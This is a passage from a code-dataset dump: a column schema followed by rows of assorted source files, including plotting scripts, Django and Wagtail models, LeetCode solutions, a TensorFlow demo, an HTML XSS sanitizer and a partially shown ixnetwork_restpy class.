| Column | Type | Range / values |
|---|---|---|
| blob_id | string | length 40–40 |
| directory_id | string | length 40–40 |
| path | string | length 3–288 |
| content_id | string | length 40–40 |
| detected_licenses | list | length 0–112 |
| license_type | string | 2 classes |
| repo_name | string | length 5–115 |
| snapshot_id | string | length 40–40 |
| revision_id | string | length 40–40 |
| branch_name | string | 684 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 (nullable ⌀) | 4.92k – 681M |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] (nullable ⌀) | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us] (nullable ⌀) | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 |
| gha_language | string | 147 classes |
| src_encoding | string | 25 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 128 – 12.7k |
| extension | string | 142 classes |
| content | string | length 128 – 8.19k |
| authors | list | length 1–1 |
| author_id | string | length 1–132 |
5160648ff6181e00a8245bb666375417f509ab68
|
02e23da0431623db86c8138bda350a1d526d4185
|
/Archivos Python Documentos/Graficas/.history/3d_20200219112629.py
|
1f977510511dff31a480c6ee7a600b119cdd23c8
|
[] |
no_license
|
Jaamunozr/Archivos-python
|
d9996d3d10ff8429cd1b4c2b396016a3a5482889
|
1f0af9ba08f12ac27e111fcceed49bbcf3b39657
|
refs/heads/master
| 2022-08-05T14:49:45.178561
| 2022-07-13T13:44:39
| 2022-07-13T13:44:39
| 244,073,267
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 417
|
py
|
import pylab as pl
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
fig = pl.figure()
ax = Axes3D(fig)
X = np.arange(-10, 10, 0.25)
Y = np.arange(-10, 10, 0.25)
X, Y = np.meshgrid(X, Y)
Z = np.sqrt(X ** 2 + Y ** 3)  # note: the sqrt is NaN wherever Y ** 3 < 0, leaving holes in the surface
ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=pl.cm.hot)
ax.contourf(X, Y, Z, zdir='z', offset=-2, cmap=pl.cm.hot)
ax.set_zlim(-2, 2)
pl.show()
|
[
"jaamunozr@gmail.com"
] |
jaamunozr@gmail.com
|
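A minimal sketch of the same surface-plus-contour figure against the current Matplotlib API, assuming Matplotlib ≥ 3.4 (where `Axes3D(fig)` no longer adds itself to the figure by default); `Y ** 2` stands in for the original `Y ** 3` so the square root stays real:

```python
import numpy as np
import matplotlib.pyplot as plt

fig = plt.figure()
ax = fig.add_subplot(projection='3d')  # replaces the legacy Axes3D(fig) constructor
X, Y = np.meshgrid(np.arange(-10, 10, 0.25), np.arange(-10, 10, 0.25))
Z = np.sqrt(X ** 2 + Y ** 2)  # kept real-valued everywhere
ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=plt.cm.hot)
ax.contourf(X, Y, Z, zdir='z', offset=-2, cmap=plt.cm.hot)
ax.set_zlim(-2, 2)
plt.show()
```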
4a78a093202a039af99d5d6f6fa91fbb5996a7b5
|
e0980f704a573894350e285f66f4cf390837238e
|
/.history/news/models_20201124144521.py
|
8af4cd733221c3bf6f1b3de3521f5b42a13a09fd
|
[] |
no_license
|
rucpata/WagtailWebsite
|
28008474ec779d12ef43bceb61827168274a8b61
|
5aa44f51592f49c9a708fc5515ad877c6a29dfd9
|
refs/heads/main
| 2023-02-09T15:30:02.133415
| 2021-01-05T14:55:45
| 2021-01-05T14:55:45
| 303,961,094
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,234
|
py
|
from django.db import models
from wagtail.admin.edit_handlers import FieldPanel, InlinePanel
from wagtail.contrib.forms.models import AbstractEmailForm
from wagtail.core.fields import RichTextField
from wagtail.images.edit_handlers import ImageChooserPanel


# Create your models here.
class NewsPage(AbstractEmailForm):
    template = 'news/news_page.html'
    landing_page_template = 'news/news_page_leading.html'
    subpage_types = []
    max_count = 1

    intro = RichTextField(blank=True, features=['bold', 'italic', 'ol', 'ul'])
    thank_you_text = RichTextField(
        blank=True,
        features=['bold', 'italic', 'ol', 'ul'])
    map_image = models.ForeignKey(
        'wagtailimages.Image',
        null=True,
        blank=False,
        on_delete=models.SET_NULL,
        help_text='The image will be cropped to 588px by 355px',
        related_name='+',
    )
    map_url = models.URLField(
        blank=True,
        help_text='Optional. If you provide a link here, the image will become'
    )

    content_panels = AbstractEmailForm.content_panels + [
        FieldPanel('intro'),
        ImageChooserPanel('map_image'),
        FieldPanel('map_url'),
        InlinePanel('form_fields', label="Form Fields"),
        FieldPanel('thank_you_text'),
        FieldPanel('from_address'),
        FieldPanel('to_address'),
        FieldPanel('subject'),
    ]
|
[
"rucinska.patrycja@gmail.com"
] |
rucinska.patrycja@gmail.com
|
6a757cada6a40ec963004ced739f41d9c6365765
|
350db570521d3fc43f07df645addb9d6e648c17e
|
/0349_Intersection_of_Two_Arrays/solution.py
|
09b0c446678c615e5439884d5e2bd613446fb3e3
|
[] |
no_license
|
benjaminhuanghuang/ben-leetcode
|
2efcc9185459a1dd881c6e2ded96c42c5715560a
|
a2cd0dc5e098080df87c4fb57d16877d21ca47a3
|
refs/heads/master
| 2022-12-10T02:30:06.744566
| 2022-11-27T04:06:52
| 2022-11-27T04:06:52
| 236,252,145
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 681
|
py
|
'''
349. Intersection of Two Arrays
Given two arrays, write a function to compute their intersection.
Example:
Given nums1 = [1, 2, 2, 1], nums2 = [2, 2], return [2].
Note:
Each element in the result must be unique.
The result can be in any order.
'''
def arrays_intersection(nums1, nums2):
    return set(nums1).intersection(nums2)


# Input:
# [1,2,2,1]
# [2]
# Output:
# [2,2]
# Expected:
# [2]


def arrays_intersection_2(nums1, nums2):
    nums2_set = set(nums2)  # build the set once so membership tests are O(1)
    return [x for x in set(nums1) if x in nums2_set]


def arrays_intersection_3(nums1, nums2):
    return list(set(nums1) & set(nums2))


b1 = [1, 2, 3, 4, 5, 9, 11, 15]
b2 = [4, 5, 6, 7, 8]
print(arrays_intersection(b1, b2))
|
[
"bhuang@rms.com"
] |
bhuang@rms.com
|
724d0bb4e0744c1d6d69e5e19135a4287262044b
|
eb0711915d6bba2f765f052736e33ac9a9a397a6
|
/HE0435/simulation/rebin/rebin_arc.py~
|
337e999780ea9cca34a003793c200dfa2a4d4cf5
|
[] |
no_license
|
dartoon/GL_HostGalaxy
|
cd2166f273ae7e0397a7d2d39f760ab59e86f014
|
7469f1c1e640d176a75cc6e9497920e494ad656a
|
refs/heads/master
| 2016-08-11T13:27:17.545360
| 2016-04-07T19:04:57
| 2016-04-07T19:04:57
| 46,524,027
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 856
|
# From high-resolution images (sub=6) to a lower-resolution one (binned together)
from numpy import *
from block import *
import pyfits

file1 = open('../pylens/HE0435.txt', 'r')
para = loadtxt(file1)
file1.close()
# print len(para)
ln = len(para)
for l in range(ln):
    filename = '../fits/HE_arc-{0}.fits'.format(l + 1)  # take one image
    d = pyfits.open(filename)[0].data.copy()
    d = concatenate([d, zeros([10, len(d.T)])])
    d = concatenate([d, zeros([len(d), 10])], axis=1)  # expand the array
    # print sum(d[65:69,67:71])
    # [0:136] x, y -> y, x
    ####       y  x
    # 0:174
    a = [0, 3, 0, 3, 2, 5, 2, 5, 4, 1, 4, 1]
    b = [0, 0, 3, 3, 4, 4, 1, 1, 2, 2, 5, 5]  # from the info given by Kai
    for i in range(len(a)):
        dd = d[a[i]:360 + a[i], b[i]:360 + b[i]]  # the size before binning
        aaa = block(dd, (60, 60))
        pyfits.PrimaryHDU(aaa).writeto('../fits/binall/arc-{0}-{1}.fits'.format(l + 1, i + 1), clobber=True)
|
[
"dingxuheng@mail.bnu.edu.cn"
] |
dingxuheng@mail.bnu.edu.cn
|
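`block()` above comes from a local module that isn't in this row; a plain-NumPy equivalent of the 360×360 → 60×60 binning is a reshape trick, sketched here under the assumption that `block()` bin-averages (swap `.mean` for `.sum` if it accumulates flux instead):

```python
import numpy as np

def rebin(a, shape):
    # Bin-average a 2-D array down to `shape`; dimensions must divide evenly.
    rows, cols = shape
    return a.reshape(rows, a.shape[0] // rows, cols, a.shape[1] // cols).mean(axis=(1, 3))

dd = np.arange(360 * 360, dtype=float).reshape(360, 360)
aaa = rebin(dd, (60, 60))  # 6x6 blocks averaged, matching block(dd, (60, 60)) if it averages
```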
8559ef8a1708043e87dc324c69fdc5c2fd4a9cc5
|
5306217707f99ff1d082bb974db0ccebf948763f
|
/ntds/management/commands/load_ntd_reporters.py
|
6a982e8e91b60fd7022f626c0220309161086c87
|
[] |
no_license
|
sparkplug/rapidsms-ntds
|
05b64e67d5bcf751029653eb2f2a64e331e9a9c9
|
8b42c749db4c34e43eb39f3c52d540c84a8b810e
|
refs/heads/master
| 2021-01-16T17:45:09.821171
| 2016-02-15T20:50:26
| 2016-02-15T20:50:26
| 25,920,319
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,712
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from django.core.management import BaseCommand
from django.core.exceptions import ValidationError  # needed for the except clauses below
from rapidsms_xforms.models import *
from ntds.utils import validate_number
from rapidsms.contrib.locations.models import Location
from django.utils.safestring import mark_safe
from ntds.models import Reporter
import operator
from django.db.models import Q
import re
from rapidsms_httprouter.models import Message, Connection
from django.contrib.auth.models import User, Group
from openpyxl.reader.excel import load_workbook
from openpyxl.workbook import Workbook
from uganda_common.utils import assign_backend
from healthmodels.models.HealthProvider import HealthProvider
from rapidsms.models import Connection, Contact, Backend
from optparse import make_option
import django


class Command(BaseCommand):
    option_list = BaseCommand.option_list + (
        make_option('-f', '--file', dest='file'),)

    def handle(self, **options):
        file = options['file']
        wb = load_workbook(filename=file)
        ws = wb.get_sheet_by_name("Community and Schools")
        for row in ws.rows[1:]:
            try:
                role, _ = Group.objects.get_or_create(name='Ntds')
                mobile_is_valid, cleaned_mobile = validate_number("0" + str(row[10].value))
                try:
                    msisdn, backend = assign_backend(cleaned_mobile)
                except ValidationError:
                    msisdn, backend = assign_backend(str(row[10].value).split("/")[0])
                backend, _ = Backend.objects.get_or_create(name="yo")
                connection, conn_created = Connection.objects.get_or_create(identity=cleaned_mobile, backend=backend)
                try:
                    district = Location.objects.filter(type="district", name__icontains=row[2].value.strip())[0]
                except IndexError:
                    district = None
                try:
                    subcounty = Location.objects.filter(type="sub_county", name__icontains=row[5].value.strip())[0]
                except IndexError:
                    subcounty = None
                try:
                    pr = row[8].value.strip()
                    if pr == "Aria":
                        pr = "Ariya"
                    parish = district.get_descendants().filter(type="parish", name__icontains=row[8].value.strip())[0]
                except IndexError:
                    parish = None
                    print "index error %s" % row[8].value
                if conn_created:
                    provider = HealthProvider.objects.create(name=row[9].value.strip(), location=parish)
                    provider.groups.add(role)
                    connection.contact = provider
                    connection.save()
                    rep = Reporter(healthprovider_ptr=provider)
                    rep.__dict__.update(provider.__dict__)
                    rep.district = district
                    rep.subcounty = subcounty
                    rep.parish = parish
                    rep.community = row[11].value.strip()
                    rep.id_number = str(row[0].value)
                    rep.county = row[3].value.strip()
                    rep.subcounty_supervisor = row[6].value.strip()
                    _, s_mobile = validate_number(str(row[7].value))
                    rep.subcounty_supervisor_mobile = s_mobile
                    rep.region = row[1].value.strip()
                    rep.health_subcounty = row[4].value.strip()
                    rep.subcounty_name = row[5].value.strip()
                    rep.parish_name = row[8].value.strip()
                    rep.save()
            except ValidationError:
                pass
|
[
"mossplix@gmail.com"
] |
mossplix@gmail.com
|
f7ed33b9024bcb5172bdd606904702df2764077f
|
f043fee89c0e2030386adcebb74d08164b7b974f
|
/reagent/net_builder/continuous_actor/fully_connected.py
|
d4e4b0544a3a1aedfbc18dfbfa123066351d9bac
|
[
"BSD-3-Clause"
] |
permissive
|
IronOnet/ReAgent
|
c2d22e7dc63eaf61e0a50e9343110c6df79a9b40
|
67434f458cde1f2c946237e866a73392279a7ede
|
refs/heads/master
| 2023-04-06T17:31:59.751700
| 2021-04-12T21:56:19
| 2021-04-12T21:57:05
| 357,700,053
| 2
| 0
|
BSD-3-Clause
| 2021-04-13T22:04:09
| 2021-04-13T22:04:09
| null |
UTF-8
|
Python
| false
| false
| 1,998
|
py
|
#!/usr/bin/env python3

from typing import List, Optional

from reagent.core.dataclasses import dataclass, field
from reagent.core.parameters import NormalizationData, param_hash
from reagent.models.actor import FullyConnectedActor
from reagent.models.base import ModelBase
from reagent.net_builder.continuous_actor_net_builder import ContinuousActorNetBuilder
from reagent.preprocessing.identify_types import CONTINUOUS_ACTION
from reagent.preprocessing.normalization import get_num_output_features


@dataclass
class FullyConnected(ContinuousActorNetBuilder):
    __hash__ = param_hash

    sizes: List[int] = field(default_factory=lambda: [128, 64])
    activations: List[str] = field(default_factory=lambda: ["relu", "relu"])
    use_batch_norm: bool = False
    use_layer_norm: bool = False
    action_activation: str = "tanh"
    exploration_variance: Optional[float] = None

    def __post_init_post_parse__(self):
        super().__init__()
        assert len(self.sizes) == len(self.activations), (
            f"Must have the same numbers of sizes and activations; got: "
            f"{self.sizes}, {self.activations}"
        )

    @property
    def default_action_preprocessing(self) -> str:
        return CONTINUOUS_ACTION

    def build_actor(
        self,
        state_normalization_data: NormalizationData,
        action_normalization_data: NormalizationData,
    ) -> ModelBase:
        state_dim = get_num_output_features(
            state_normalization_data.dense_normalization_parameters
        )
        action_dim = get_num_output_features(
            action_normalization_data.dense_normalization_parameters
        )
        return FullyConnectedActor(
            state_dim=state_dim,
            action_dim=action_dim,
            sizes=self.sizes,
            activations=self.activations,
            use_batch_norm=self.use_batch_norm,
            action_activation=self.action_activation,
            exploration_variance=self.exploration_variance,
        )
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
4ca9ecc74b019cd4659ed7ea6d8725e8ecdc45b2
|
780fa3fed7e5890f26f9c952f10cefbacfa6e09a
|
/recursive_convolution.py
|
69f1fc591f8ffd4d30a7c182f4f9dc8aae9f26f8
|
[] |
no_license
|
jsrimr/code_during_KTaiacadmey
|
d508303417fe0916f98f7cd65c6521adb0a933fa
|
ab98b1613d9cb8ca77cd2462e0a42664b71bd758
|
refs/heads/master
| 2021-12-03T08:09:01.199462
| 2018-06-25T05:49:07
| 2018-06-25T05:49:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,346
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 22 17:18:19 2018

@author: ktai12
"""
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt

sess = tf.InteractiveSession()

from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)

# Let's check how convolution compresses!
# Five pictures with different compression ratios
img = mnist.train.images[0].reshape(28, 28)
# original - 28*28
plt.imshow(img)
plt.title('original')

W = tf.Variable(tf.random_normal([3, 3, 1, 1], stddev=0.01))
img = img.reshape(-1, 28, 28, 1)
conv2d = tf.nn.conv2d(img, W, strides=[1, 1, 1, 1], padding="VALID")
sess.run(tf.global_variables_initializer())
conv2d_img1 = conv2d.eval()
conv2d_img1.shape
# convolution once - 26*26
img1 = conv2d_img1.reshape(26, 26)
plt.imshow(img1)
plt.title('once')

# convolution twice
conv2d = tf.nn.conv2d(conv2d_img1, W, strides=[1, 1, 1, 1], padding="VALID")
conv2d_img2 = conv2d.eval()
conv2d_img2.shape
img2 = conv2d_img2.reshape(24, 24)
plt.imshow(img2)
plt.title('twice')

tmp = img.reshape(28, 28)  # back to 2-D so shape[0] is the spatial size below
for i in range(10):
    a = tmp.shape[0]
    tmp = tmp.reshape(-1, a, a, 1)
    conv2d = tf.nn.conv2d(tmp, W, strides=[1, 1, 1, 1], padding="VALID")
    conv2d_img = conv2d.eval()
    k = conv2d_img.shape[1]
    tmp = conv2d_img.reshape(k, k)
    plt.imshow(tmp)
    plt.title("{0}*{0} size".format(k))
    plt.show()
|
[
"jsrimr@naver.com"
] |
jsrimr@naver.com
|
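A `padding="VALID"` pass with a 3×3 kernel at stride 1 shrinks each spatial dimension by 2 (out = in − kernel + 1), which is why the script sees 28 → 26 → 24 and the loop keeps shrinking the image. A quick check of that arithmetic:

```python
# Output size of a VALID convolution: out = in - kernel + 1 (stride 1, kernel 3).
size = 28
sizes = []
for _ in range(10):
    size = size - 3 + 1
    sizes.append(size)
print(sizes)  # [26, 24, 22, 20, 18, 16, 14, 12, 10, 8]
```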
aa6ea506e424f5b0a50f4537652395b31a901596
|
75e1d9446cb1fca5c6a79ad0ba7f38268df1161f
|
/Python Programs/rotate-matrix-pattern.py
|
baeb1e16ee8363e61f12b29a05e4442f2d438d48
|
[
"CC0-1.0"
] |
permissive
|
muhammad-masood-ur-rehman/Skillrack
|
6e9b6d93680dfef6f40783f02ded8a0d4283c98a
|
71a25417c89d0efab40ee6229ccd758b26ae4312
|
refs/heads/main
| 2023-02-03T16:45:54.462561
| 2020-12-23T08:36:28
| 2020-12-23T08:36:28
| 324,221,340
| 4
| 1
|
CC0-1.0
| 2020-12-24T19:12:54
| 2020-12-24T19:12:54
| null |
UTF-8
|
Python
| false
| false
| 1,377
|
py
|
'''
Rotate Matrix Pattern
The program must accept an integer matrix of size N*N as the input. The program must rotate the matrix by 45 degrees in the clockwise direction. Then the program must print the rotated matrix and print asterisks instead of empty places as the output.
Boundary Condition(s):
3 <= N <= 100
Input Format:
The first line contains N.
The next N lines, each contains N integers separated by a space.
Output Format:
The first (2*N)-1 lines containing the rotated matrix.
Example Input/Output 1:
Input:
3
1 2 3
4 5 6
7 8 9
Output:
**1
*4 2
7 5 3
*8 6
**9
Explanation:
After rotating the matrix by 45 degrees in the clockwise direction, the matrix becomes
1
4 2
7 5 3
8 6
9
So the rotated matrix is printed and the asterisks are printed instead of empty places.
Example Input/Output 2:
Input:
4
13 21 36 49
55 65 57 80
17 32 63 44
56 60 78 98
Output:
***13
**55 21
*17 65 36
56 32 57 49
*60 63 80
**78 44
***98
'''
n = int(input())
arr = []
for i in range(n):
    # each of the next N lines carries N space-separated integers
    arr.append(list(map(int, input().split())))
s1, s2 = 0, 0
stars = n - 1
for i in range(1, (2 * n)):
    i1 = s1
    i2 = s2
    for j in range(1, n + 1):
        if j <= stars:
            print("*", end='')
        else:
            print(arr[i1][i2], end=" ")
            i1 -= 1
            i2 += 1
    if i > n - 1:
        s2 += 1
        stars += 1
    else:
        stars -= 1
        s1 += 1
    print("")
|
[
"36339675+hemanthtejadasari@users.noreply.github.com"
] |
36339675+hemanthtejadasari@users.noreply.github.com
|
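The index bookkeeping with `s1`, `s2`, `i1`, `i2` above is reading anti-diagonals: output line r collects the cells with i + j == r, highest row index first, padded with `n - len(cells)` leading asterisks. A compact sketch of the same idea for cross-checking:

```python
# Sketch: each output line r holds the anti-diagonal i + j == r,
# read from the highest row index down, left-padded with asterisks.
def rotate45(arr):
    n = len(arr)
    for r in range(2 * n - 1):
        lo, hi = max(0, r - n + 1), min(r, n - 1)
        cells = [arr[i][r - i] for i in range(hi, lo - 1, -1)]
        print('*' * (n - len(cells)) + ' '.join(str(v) for v in cells))

rotate45([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
# **1
# *4 2
# 7 5 3
# *8 6
# **9
```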
079896499559440bc3938ad7b69fe1408bc3ac4c
|
7f167121b52312d65663d781819356eac65843ed
|
/lib/xss.py
|
d7d8def40702d5eb17aac4d709ddc99b82bb50ed
|
[] |
no_license
|
mongoltolbo/mifan.tv
|
b3526aaeb5394b3ac1e7af85b8ea3a74e90ce73e
|
9ba59b049866dff7c4d9eceabed91d8a1878ef4b
|
refs/heads/master
| 2020-05-04T19:20:22.340674
| 2013-08-27T15:53:34
| 2013-08-27T15:53:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,954
|
py
|
#!/usr/bin/env python
# coding=utf-8
#
# Copyright 2013 tuila.me
# Source: http://code.activestate.com/recipes/496942/ (r1)

import re
from htmllib import HTMLParser
from cgi import escape
from urlparse import urlparse
from formatter import AbstractFormatter
from htmlentitydefs import entitydefs
from xml.sax.saxutils import quoteattr


def xssescape(text):
    """Gets rid of < and > and & and, for good measure, :"""
    # return escape(text, quote=True).replace(':', '&#58;')
    # return re.sub(r'(?<!http)(?<!https):', '&#58;', escape(text, quote=True))
    return escape(text, quote=True)


class XssCleaner(HTMLParser):

    def __init__(self, fmt=AbstractFormatter):
        HTMLParser.__init__(self, fmt)
        self.result = ""
        self.open_tags = []
        # A list of the only tags allowed. Be careful adding to this. Adding
        # "script," for example, would not be smart. 'img' is out by default
        # because of the danger of IMG embedded commands, and/or web bugs.
        self.permitted_tags = ['a', 'b', 'blockquote', 'br', 'i',
                               'li', 'ol', 'ul', 'p', 'cite']
        # A list of tags that require no closing tag.
        self.requires_no_close = ['img', 'br']
        # A dictionary showing the only attributes allowed for particular tags.
        # If a tag is not listed here, it is allowed no attributes. Adding
        # "on" tags, like "onhover," would not be smart. Also be very careful
        # of "background" and "style."
        self.allowed_attributes = \
            {'a': ['href', 'title'],
             'img': ['src', 'alt'],
             'blockquote': ['type']}
        # The only schemes allowed in URLs (for href and src attributes).
        # Adding "javascript" or "vbscript" to this list would not be smart.
        self.allowed_schemes = ['http', 'https', 'ftp']

    def handle_data(self, data):
        if data:
            self.result += xssescape(data)

    def handle_charref(self, ref):
        if len(ref) < 7 and ref.isdigit():
            self.result += '&#%s;' % ref
        else:
            self.result += xssescape('&#%s' % ref)

    def handle_entityref(self, ref):
        if ref in entitydefs:
            self.result += '&%s;' % ref
        else:
            self.result += xssescape('&%s' % ref)

    def handle_comment(self, comment):
        if comment:
            self.result += xssescape("<!--%s-->" % comment)

    def handle_starttag(self, tag, method, attrs):
        if tag not in self.permitted_tags:
            self.result += xssescape("<%s>" % tag)
        else:
            bt = "<" + tag
            if tag in self.allowed_attributes:
                attrs = dict(attrs)
                self.allowed_attributes_here = \
                    [x for x in self.allowed_attributes[tag] if x in attrs
                     and len(attrs[x]) > 0]
                for attribute in self.allowed_attributes_here:
                    if attribute in ['href', 'src', 'background']:
                        if self.url_is_acceptable(attrs[attribute]):
                            bt += ' %s="%s"' % (attribute, attrs[attribute])
                    else:
                        bt += ' %s=%s' % \
                            (xssescape(attribute), quoteattr(attrs[attribute]))
                if bt == "<a" or bt == "<img":
                    return
            if tag in self.requires_no_close:
                bt += "/"
            bt += ">"
            self.result += bt
            self.open_tags.insert(0, tag)

    def handle_endtag(self, tag, attrs):
        bracketed = "</%s>" % tag
        if tag not in self.permitted_tags:
            self.result += xssescape(bracketed)
        elif tag in self.open_tags:
            self.result += bracketed
            self.open_tags.remove(tag)

    def unknown_starttag(self, tag, attributes):
        self.handle_starttag(tag, None, attributes)

    def unknown_endtag(self, tag):
        self.handle_endtag(tag, None)

    def url_is_acceptable(self, url):
        # Requires all URLs to be "absolute".
        parsed = urlparse(url)
        return parsed[0] in self.allowed_schemes and '.' in parsed[1]

    def strip(self, rawstring):
        """Returns the argument stripped of potentially harmful HTML or Javascript code"""
        self.result = ""
        self.feed(rawstring)
        for endtag in self.open_tags:
            if endtag not in self.requires_no_close:
                self.result += "</%s>" % endtag
        return self.result

    def xtags(self):
        """Returns a printable string informing the user which tags are allowed"""
        self.permitted_tags.sort()
        tg = ""
        for x in self.permitted_tags:
            tg += "<" + x
            if x in self.allowed_attributes:
                for y in self.allowed_attributes[x]:
                    tg += ' %s=""' % y
            tg += "> "
        return xssescape(tg.strip())
|
[
"gaolinjie@gmail.com"
] |
gaolinjie@gmail.com
|
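Typical use of the cleaner above (Python 2 only, since `htmllib`, `cgi.escape`, and `urlparse` are gone in Python 3): feed untrusted markup to `strip()`; whitelisted tags pass through and everything else comes back entity-escaped. The output shown is approximate:

```python
# Usage sketch (Python 2, matching the htmllib/urlparse imports above).
cleaner = XssCleaner()
print(cleaner.strip('<i>ok</i><u onclick="evil()">u is not whitelisted</u>'))
# roughly: <i>ok</i>&lt;u&gt;u is not whitelisted&lt;/u&gt;
print(cleaner.xtags())  # lists permitted tags with their allowed attributes
```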
deb0e9f6012ff44565f83f4240236d6e9dba8965
|
1ee3dc4fa096d12e409af3a298ba01f5558c62b5
|
/ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/nettopologytree.py
|
b6b429aac376022dac44a1359e79e6768a182f2c
|
[
"MIT"
] |
permissive
|
parthpower/ixnetwork_restpy
|
321e64a87be0a4d990276d26f43aca9cf4d43cc9
|
73fa29796a5178c707ee4e21d90ff4dad31cc1ed
|
refs/heads/master
| 2020-07-04T13:34:42.162458
| 2019-08-13T20:33:17
| 2019-08-13T20:33:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,828
|
py
|
# MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class NetTopologyTree(Base):
    """The NetTopologyTree class encapsulates a user managed netTopologyTree node in the ixnetwork hierarchy.

    An instance of the class can be obtained by accessing the NetTopologyTree property from a parent instance.
    The internal properties list will be empty when the property is accessed and is populated from the server using the find method.
    The internal properties list can be managed by the user by using the add and remove methods.
    """

    _SDM_NAME = 'netTopologyTree'

    def __init__(self, parent):
        super(NetTopologyTree, self).__init__(parent)

    @property
    def IncludeEntryPoint(self):
        """if true, entry node belongs to ring topology, otherwise it is outside of ring

        Returns:
            bool
        """
        return self._get_attribute('includeEntryPoint')

    @IncludeEntryPoint.setter
    def IncludeEntryPoint(self, value):
        self._set_attribute('includeEntryPoint', value)

    @property
    def LinkMultiplier(self):
        """number of links between two nodes

        Returns:
            number
        """
        return self._get_attribute('linkMultiplier')

    @LinkMultiplier.setter
    def LinkMultiplier(self, value):
        self._set_attribute('linkMultiplier', value)

    @property
    def MaxChildPerNode(self):
        """Maximum children per node

        Returns:
            number
        """
        return self._get_attribute('maxChildPerNode')

    @MaxChildPerNode.setter
    def MaxChildPerNode(self, value):
        self._set_attribute('maxChildPerNode', value)

    @property
    def Nodes(self):
        """number of nodes

        Returns:
            number
        """
        return self._get_attribute('nodes')

    @Nodes.setter
    def Nodes(self, value):
        self._set_attribute('nodes', value)

    @property
    def TreeDepth(self):
        """Depth of the Tree, defined as length of path from root node to deepest node in the tree

        Returns:
            number
        """
        return self._get_attribute('treeDepth')

    @TreeDepth.setter
    def TreeDepth(self, value):
        self._set_attribute('treeDepth', value)

    @property
    def UseTreeDepth(self):
        """Use Tree Depth

        Returns:
            bool
        """
        return self._get_attribute('useTreeDepth')

    @UseTreeDepth.setter
    def UseTreeDepth(self, value):
        self._set_attribute('useTreeDepth', value)

    def update(self, IncludeEntryPoint=None, LinkMultiplier=None, MaxChildPerNode=None, Nodes=None, TreeDepth=None, UseTreeDepth=None):
        """Updates a child instance of netTopologyTree on the server.

        Args:
            IncludeEntryPoint (bool): if true, entry node belongs to ring topology, otherwise it is outside of ring
            LinkMultiplier (number): number of links between two nodes
            MaxChildPerNode (number): Maximum children per node
            Nodes (number): number of nodes
            TreeDepth (number): Depth of the Tree, defined as length of path from root node to deepest node in the tree
            UseTreeDepth (bool): Use Tree Depth

        Raises:
            ServerError: The server has encountered an uncategorized error condition
        """
        self._update(locals())

    def add(self, IncludeEntryPoint=None, LinkMultiplier=None, MaxChildPerNode=None, Nodes=None, TreeDepth=None, UseTreeDepth=None):
        """Adds a new netTopologyTree node on the server and retrieves it in this instance.

        Args:
            IncludeEntryPoint (bool): if true, entry node belongs to ring topology, otherwise it is outside of ring
            LinkMultiplier (number): number of links between two nodes
            MaxChildPerNode (number): Maximum children per node
            Nodes (number): number of nodes
            TreeDepth (number): Depth of the Tree, defined as length of path from root node to deepest node in the tree
            UseTreeDepth (bool): Use Tree Depth

        Returns:
            self: This instance with all currently retrieved netTopologyTree data using find and the newly added netTopologyTree data available through an iterator or index

        Raises:
            ServerError: The server has encountered an uncategorized error condition
        """
        return self._create(locals())

    def remove(self):
        """Deletes all the netTopologyTree data in this instance from server.

        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        self._delete()

    def find(self, IncludeEntryPoint=None, LinkMultiplier=None, MaxChildPerNode=None, Nodes=None, TreeDepth=None, UseTreeDepth=None):
        """Finds and retrieves netTopologyTree data from the server.

        All named parameters support regex and can be used to selectively retrieve netTopologyTree data from the server.
